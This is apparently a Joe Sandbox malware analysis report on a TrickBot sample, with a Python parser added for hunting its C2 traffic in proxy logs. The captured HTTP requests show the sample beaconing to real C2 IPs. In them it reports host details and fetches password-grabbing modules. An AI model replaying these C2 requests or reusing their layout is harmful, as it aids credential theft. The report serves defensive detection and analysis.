      Source: History.bak.13.drString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/AutoIt
      Source: History.bak.13.drString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
      Source: Web Data.bak.13.drString found in binary or memory: https://www.google.com/favicon.ico
      Source: History.bak.13.drString found in binary or memory: https://www.google.com/search?q=adobe
      Source: History.bak.13.drString found in binary or memory: https://www.google.com/search?q=at
      Source: History.bak.13.drString found in binary or memory: https://www.google.com/search?q=autoit
      Source: History.bak.13.drString found in binary or memory: https://www.google.com/search?q=bios320.exe
      Source: History.bak.13.drString found in binary or memory: https://www.google.com/search?q=firefox
      Source: History.bak.13.drString found in binary or memory: https://www.google.com/search?q=java
      Source: History.bak.13.drString found in binary or memory: https://www.google.com/search?q=testzentrum
      Source: History.bak.13.drString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
      Source: History.bak.13.drString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releaseDownload
      Source: History.bak.13.drString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
      Source: History.bak.13.drString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
      Source: History.bak.13.drString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/Download
      Source: History.bak.13.drString found in binary or memory: https://www.office.com/setup
      Source: History.bak.13.drString found in binary or memory: https://www.office.com/setupMicrosoft
      Source: unknown | HTTP traffic detected: POST /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/VERS// HTTP/1.1
          Connection: Keep-Alive
          Content-Type: multipart/form-data; boundary=------Boundary00F7D7B1
          User-Agent: curl/7.77.0
          Content-Length: 141
          Host: 46.99.175.217
      Source: unknown | DNS traffic detected: queries for: ip.anysrc.net
      Source: global traffic | HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/file/ HTTP/1.1
          Connection: Keep-Alive
          User-Agent: curl/7.77.0
          Host: 46.99.175.217
      Source: global traffic | HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/0/Windows%2010%20x64/1108/102.129.143.91/6760749C3E0F3C8028653796E6C431FC062A0AA0107C34B734353BDE5C7824FB/K4eaS6gi8qoueakyUIyY/ HTTP/1.1
          Connection: Keep-Alive
          User-Agent: curl/7.77.0
          Host: 46.99.175.217
      Source: global traffic | HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/user/user/0/ HTTP/1.1
          Connection: Keep-Alive
          User-Agent: curl/7.77.0
          Host: 46.99.175.217
      Source: global traffic | HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/path/C:%5CUsers%5Cuser%5CAppData%5CRoaming%5CGNU-Rach-559H%5CdngqoAXyDd.exe/0/ HTTP/1.1
          Connection: Keep-Alive
          User-Agent: curl/7.77.0
          Host: 46.99.175.217
      Source: global traffic | HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/23/100019/ HTTP/1.1
          Connection: Keep-Alive
          User-Agent: curl/7.77.0
          Host: 46.99.175.217
      Source: global traffic | HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/DNSBL/listed/0/ HTTP/1.1
          Connection: Keep-Alive
          User-Agent: curl/7.77.0
          Host: 46.99.175.217
      Source: global traffic | HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
          Connection: Keep-Alive
          User-Agent: curl/7.77.0
          Host: 46.99.175.217
      Source: global traffic | HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/ HTTP/1.1
          Connection: Keep-Alive
          User-Agent: curl/7.77.0
          Host: 24.45.255.9
      Source: global traffic | HTTP traffic detected: GET /cookiechecker?uri=/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/ HTTP/1.1
          Connection: Keep-Alive
          User-Agent: curl/7.77.0
          Host: 24.45.255.9
          Cookie: AIROS_6872516E0657=ddb722f4fb72773a791e116cf4cb38b0
      Source: global traffic | HTTP traffic detected: GET /index.html HTTP/1.1
          Connection: Keep-Alive
          User-Agent: curl/7.77.0
          Host: 24.45.255.9
          Cookie: AIROS_6872516E0657=ddb722f4fb72773a791e116cf4cb38b0
      Source: global traffic | HTTP traffic detected: GET /login.cgi?uri=/index.html HTTP/1.1
          Connection: Keep-Alive
          User-Agent: curl/7.77.0
          Host: 24.45.255.9
          Cookie: AIROS_6872516E0657=ddb722f4fb72773a791e116cf4cb38b0
      Source: global traffic | HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/ HTTP/1.1
          Connection: Keep-Alive
          User-Agent: curl/7.77.0
          Host: 202.58.199.82
      Source: global traffic | HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/dpost/ HTTP/1.1
          Connection: Keep-Alive
          User-Agent: curl/7.77.0
          Host: 46.99.175.217
      Source: global traffic | HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/10/62/LDBHBJFHFNV/1/ HTTP/1.1
          Connection: Keep-Alive
          User-Agent: curl/7.77.0
          Host: 46.99.175.217
      Source: global traffic | HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabc64/ HTTP/1.1
          Connection: Keep-Alive
          User-Agent: curl/7.77.0
          Host: 202.58.199.82
      Source: global traffic | HTTP traffic detected: GET /plain HTTP/1.1
          Connection: Keep-Alive
          User-Agent: curl/7.77.0
          Host: ip.anysrc.net
      Source: unknown | HTTPS traffic detected: 46.99.175.217:443 -> 192.168.11.20:49778 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 24.45.255.9:443 -> 192.168.11.20:49786 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 202.58.199.82:443 -> 192.168.11.20:49800 version: TLS 1.2
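      The requests listed above share one path layout, /<gtag>/<client id>/<command>/<arguments>/, and a fixed curl/7.77.0 User-Agent, which is what network detections for this TrickBot C2 protocol key on. The following Python is an added example and is not part of the Joe Sandbox report: it parses the request lines transcribed from this page into gtag (top147), client id and command number, separates the C2 beacons from the other requests (the AirOS login redirect served by 24.45.255.9 and the ip.anysrc.net lookup), and summarizes the modules requested and the host details reported. The command-number labels, the reading of W10019042 as Windows 10 build 19042, and the positional meaning of the registration fields are taken from public TrickBot reporting rather than from this page and are marked as assumptions in the code.

```python
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote

# Request layout seen in the traffic above:
#   /<gtag>/<client_id>/<command>/<arg>/<arg>/.../
# with client_id = <hostname>_W<major><minor><build>.<32 hex chars>
# (061544_W10019042.34ED...: hostname 061544, Windows 10 build 19042; the build
# reading is an assumption from public reporting, not stated by the report).
C2_PATH = re.compile(
    r"^/(?P<gtag>[A-Za-z0-9]+)"
    r"/(?P<hostname>[^/]+)_(?P<os_tag>W\d+)\.(?P<bot_id>[0-9A-F]{32})"
    r"/(?P<cmd>\d+)"
    r"(?P<rest>(?:/[^/?]*)*)$"
)

# Labels for the command numbers come from public TrickBot write-ups, not from
# this report; treat them as an assumption. Unlisted numbers are reported as unknown.
CMD_LABELS = {0: "register", 5: "get module", 10: "module result",
              14: "report", 23: "get config"}


@dataclass(frozen=True)
class C2Request:
    method: str
    c2_host: str
    gtag: str
    hostname: str
    os_tag: str
    bot_id: str
    command: int
    args: tuple
    user_agent: str

    @property
    def label(self) -> str:
        return CMD_LABELS.get(self.command, "unknown")


def parse_request(method: str, path: str, host: str, user_agent: str) -> Optional[C2Request]:
    """Return a C2Request when the path has the TrickBot layout, else None."""
    m = C2_PATH.match(path)
    if m is None:
        return None
    # Arguments are URL-encoded path segments; empty segments (trailing //) are dropped.
    args = tuple(unquote(a) for a in m.group("rest").split("/") if a)
    return C2Request(method, host, m.group("gtag"), m.group("hostname"),
                     m.group("os_tag"), m.group("bot_id"), int(m.group("cmd")),
                     args, user_agent)


# Records transcribed from the requests listed above: (method, path, Host, User-Agent).
CID = "061544_W10019042.34ED337BB336C4191A537F33B775D9BB"
UA = "curl/7.77.0"
RECORDS = [
    ("POST", f"/top147/{CID}/64/pwgrabb/VERS//", "46.99.175.217", UA),
    ("GET", f"/top147/{CID}/5/file/", "46.99.175.217", UA),
    ("GET", f"/top147/{CID}/0/Windows%2010%20x64/1108/102.129.143.91/"
            "6760749C3E0F3C8028653796E6C431FC062A0AA0107C34B734353BDE5C7824FB/"
            "K4eaS6gi8qoueakyUIyY/", "46.99.175.217", UA),
    ("GET", f"/top147/{CID}/14/user/user/0/", "46.99.175.217", UA),
    ("GET", f"/top147/{CID}/14/path/C:%5CUsers%5Cuser%5CAppData%5CRoaming"
            "%5CGNU-Rach-559H%5CdngqoAXyDd.exe/0/", "46.99.175.217", UA),
    ("GET", f"/top147/{CID}/23/100019/", "46.99.175.217", UA),
    ("GET", f"/top147/{CID}/14/DNSBL/listed/0/", "46.99.175.217", UA),
    ("GET", f"/top147/{CID}/14/NAT%20status/client%20is%20behind%20NAT/0/", "46.99.175.217", UA),
    ("GET", f"/top147/{CID}/5/pwgrabb64/", "24.45.255.9", UA),
    ("GET", f"/cookiechecker?uri=/top147/{CID}/5/pwgrabb64/", "24.45.255.9", UA),
    ("GET", "/index.html", "24.45.255.9", UA),
    ("GET", "/login.cgi?uri=/index.html", "24.45.255.9", UA),
    ("GET", f"/top147/{CID}/5/pwgrabb64/", "202.58.199.82", UA),
    ("GET", f"/top147/{CID}/5/dpost/", "46.99.175.217", UA),
    ("GET", f"/top147/{CID}/10/62/LDBHBJFHFNV/1/", "46.99.175.217", UA),
    ("GET", f"/top147/{CID}/5/pwgrabc64/", "202.58.199.82", UA),
    ("GET", "/plain", "ip.anysrc.net", UA),
]


def summarize(records=RECORDS) -> dict:
    """Split C2 beacons from other traffic and summarize what the bot asked for and reported."""
    parsed = [parse_request(*rec) for rec in records]
    c2 = [p for p in parsed if p is not None]
    registration = next((p for p in c2 if p.command == 0), None)
    return {
        "c2_requests": len(c2),
        "other_requests": len(parsed) - len(c2),
        "gtag": sorted({p.gtag for p in c2}),
        "hostnames": sorted({p.hostname for p in c2}),
        "c2_hosts": sorted({p.c2_host for p in c2}),
        "commands": sorted({p.command for p in c2}),
        "modules_requested": sorted({p.args[0] for p in c2 if p.command == 5 and p.args}),
        "reports": {p.args[0]: p.args[1] for p in c2 if p.command == 14 and len(p.args) >= 2},
        # Field positions of the registration beacon (OS, version, external IP, ...)
        # follow public TrickBot reporting; this is an assumption, not page content.
        "external_ip_in_registration": (registration.args[2]
                                        if registration and len(registration.args) > 2 else None),
    }


if __name__ == "__main__":
    for key, value in summarize().items():
        print(f"{key}: {value}")
```

      The external IP the bot places in its registration beacon (102.129.143.91) is the value it obtained from the ip.anysrc.net/plain lookup listed above, and the /14/ reports echo what the pwgrab and loader components learned about the host; both are worth extracting in a proxy-log hunt because they persist across C2 hosts while the gtag and client id stay constant.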

      E-Banking Fraud:

      Yara detected Trickbot
      Source: Yara match | File source: Process Memory Space: wermgr.exe PID: 5016, type: MEMORYSTR
      Source: Yara match | File source: 00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      Found detection on Joe Sandbox Cloud Basic with higher score
      Source: dngqoAXyDd.exe | Joe Sandbox Cloud Basic: Detection: malicious Score: 80 Threat Name: TrickBot
      Source: dngqoAXyDd.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_0075911C
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_0074C201
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_007582BD
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_0075941B
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_0074C5D3
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_007516DE
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_0075880E
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_0073C950
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_0074B9CE
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_0074C9BB
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_0075BBF1
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_00745C19
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_00757D6E
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_00754D22
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_00759E7F
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_0074BE63
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_00758EA1
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: 1_2_02883168
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECB14D0
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECC88E0
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECC1EA0
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECC4260
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECB7340
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECBC750
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECB8370
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECB2F30
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECD52C0
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECB30AA
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECC51A0
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECCED70
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECCB920
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECD4CF0
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECC9A80
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECBFE8E
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECC0A00
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECB79D0
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECC35D0
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECD45D0
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECC73A0
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECB3BB0
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECC7760
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECD5F60
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECBF700
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECD4B10
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECB4730
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECC5AC0
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECC7EE0
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECCE47D
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECC740C
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECB1030
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECD33D0
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECC17F0
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECCE3F0
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: String function: 007443E0 appears 58 times
      Source: C:\Users\user\Desktop\dngqoAXyDd.exe | Code function: String function: 007475F5 appears 33 times
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECCC550 NtDelayExecution,
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECC9CD0 NtQueryInformationProcess,
      Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECBC750 NtQuerySystemInformation,DuplicateHandle,FindCloseChangeNotification,RtlDeleteBoundaryDescriptor,
      Source: dngqoAXyDd.exe, 00000001.00000000.9203744354.00000000007C0000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamecorrect.dll( vs dngqoAXyDd.exe
      Source: dngqoAXyDd.exe | Binary or memory string: OriginalFilenamecorrect.dll( vs dngqoAXyDd.exe